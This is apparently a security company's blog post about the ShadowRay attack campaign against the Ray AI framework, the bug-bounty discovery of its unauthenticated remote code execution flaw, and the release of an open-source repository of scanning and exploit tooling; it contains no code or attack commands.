Introduction

Recently, researchers at Oligo Security uncovered an active hacking campaign against Ray, a highly popular AI infrastructure tool, via vulnerabilities first discovered on our Huntr AI bug bounty platform by researcher Sierra Haex in collaboration with Protect AI’s Threat Research team. At Protect AI, our commitment to securing artificial intelligence systems against emerging threats has always driven us to adopt a forward-thinking approach, especially from a hacker's perspective. This proactive stance stems from our deep understanding that AI infrastructure, with its complexity and lightspeed adoption rates, presents a target that is impossible to ignore for cyber adversaries. 

The campaign against Ray, dubbed ShadowRay, was inevitable and is likely the first of many such campaigns directed towards AI deployments. Our anticipation of such vulnerabilities and the subsequent exploits did not arise in a vacuum. Instead, it was the product of our extensive focus on practical AI attacks, a viewpoint that considers not if, but when and how these systems could be compromised. This incident, unfortunately, confirms our predictions and underscores a critical insight: the exploitation of AI infrastructure is not an isolated event but likely the precursor to a series of sophisticated adversarial campaigns targeting these technologies.

Discovery of the Vulnerability: Expertise and Collaboration

The path to discovering the vulnerabilities in Ray, a cornerstone of AI infrastructure, was paved by a unique blend of expertise from Protect AI's seasoned machine learning engineers, adept hackers, and the rich community of security researchers fostered on our AI bug bounty platform huntr.com. Huntr is the world’s first AI/ML bug bounty platform. A community of thousands of security researchers investigate and responsibly disclose hundreds of potential vulnerabilities every month which are issued bounty rewards and CVEs.

The security research into Ray came about when Sierra Haex, a friend and collaborator with our in-house research team, reached out. Using the in-house machine learning and security expertise, the group decided to probe Ray—a target previously overlooked by many in the security domain despite its immense popularity.

In a concerted effort, Sierra Haex and Protect AI threat researcher Dan McInerney, dedicated an afternoon to scrutinizing Ray. The team unveiled multiple high and critical vulnerabilities in less than an hour, the key finding of Ray allowing remote code execution without authentication coming from Sierra Haex. These findings were promptly and responsibly reported. However, Ray's response was to classify these findings as informational due to the architectural choices of the platform. Out of respect for the maintainers' wishes, we abstained from issuing CVEs for all the discovered issues, but credit the Ray team for quickly fixing the majority of them. Nonetheless, we remained convinced of the lingering security risks.

This conviction led to the creation of the open source ai-exploits repository. This initiative is a testament to our commitment to elevating security awareness within the AI community and providing gratis tools to help organizations assess and mitigate risks in their environments.

ai-exploits: Elevating AI Security Awareness

 

The ai-exploits repository embodies our distilled expertise in practical AI attacks, highlighting actionable security vulnerabilities within the AI domain and giving organizations the tools to test and scan their own AI deployments. Metasploit modules help organizations’ red teamers determine the impact of the vulnerabilities, and Nuclei templates help organizations’ blue teamers find the vulnerabilities in their environments all wrapped up in an easy to deploy Docker image. 

Curiously, many professional-grade vulnerability scanners do not possess plugins that detect these highly impactful vulnerabilities. Due to this, a custom Nmap script to help find potentially vulnerable AI tools is also included. The repository is free to use and is updated on a monthly basis with additional tooling around vulnerabilities as we and the valued researchers at huntr.com uncover them.

The Path Forward

The discovery of the ShadowRay vulnerability in Ray serves as a stark reminder of the security challenges facing the AI community. We believe that similar campaigns are likely already being deployed in multiple other tools that were the focus of our internal and huntr community’s research. Carve your name into the history of AI security research by becoming a huntr. 

"Having projects like Ray be developed in the open allows researchers like myself, Dan McInerney and others to assist and work alongside developers to find these sorts of bugs and squash them. AI developers are doing important work, and if we can help make their tools more secure, the faster we all can progress." said Sierra Haex.

Our collaborative research, enhanced by contributions from independent security experts on the huntr.com AI bug bounty platform, uncovers a terrain fraught with vulnerabilities. These vulnerabilities open the door to full system compromises, unauthorized access to sensitive data, models, or credentials, frequently without the need for authentication. Far too often, the focus on theoretical or academic research—such as devising methods to deceive a model into misclassifying an image—diverts attention from these practical security challenges that pose a more immediate threat to the integrity of AI systems.

We believe that securing AI tools requires a collaborative effort involving developers, users, researchers, and the broader open-source community. By sharing our findings and working together, we can ensure that the AI tools we rely on are not only powerful and efficient but also secure and resilient against threats.

Special Thanks

We extend our gratitude to the AI and security communities for their support and collaboration. Thanks to researcher Sierra Haex for your work on securing the Ray project and to the Ray maintainers who fixed many of the issues quickly. Our research is driven by a commitment to securing the future of AI, and we look forward to continuing our work with the community to achieve this goal.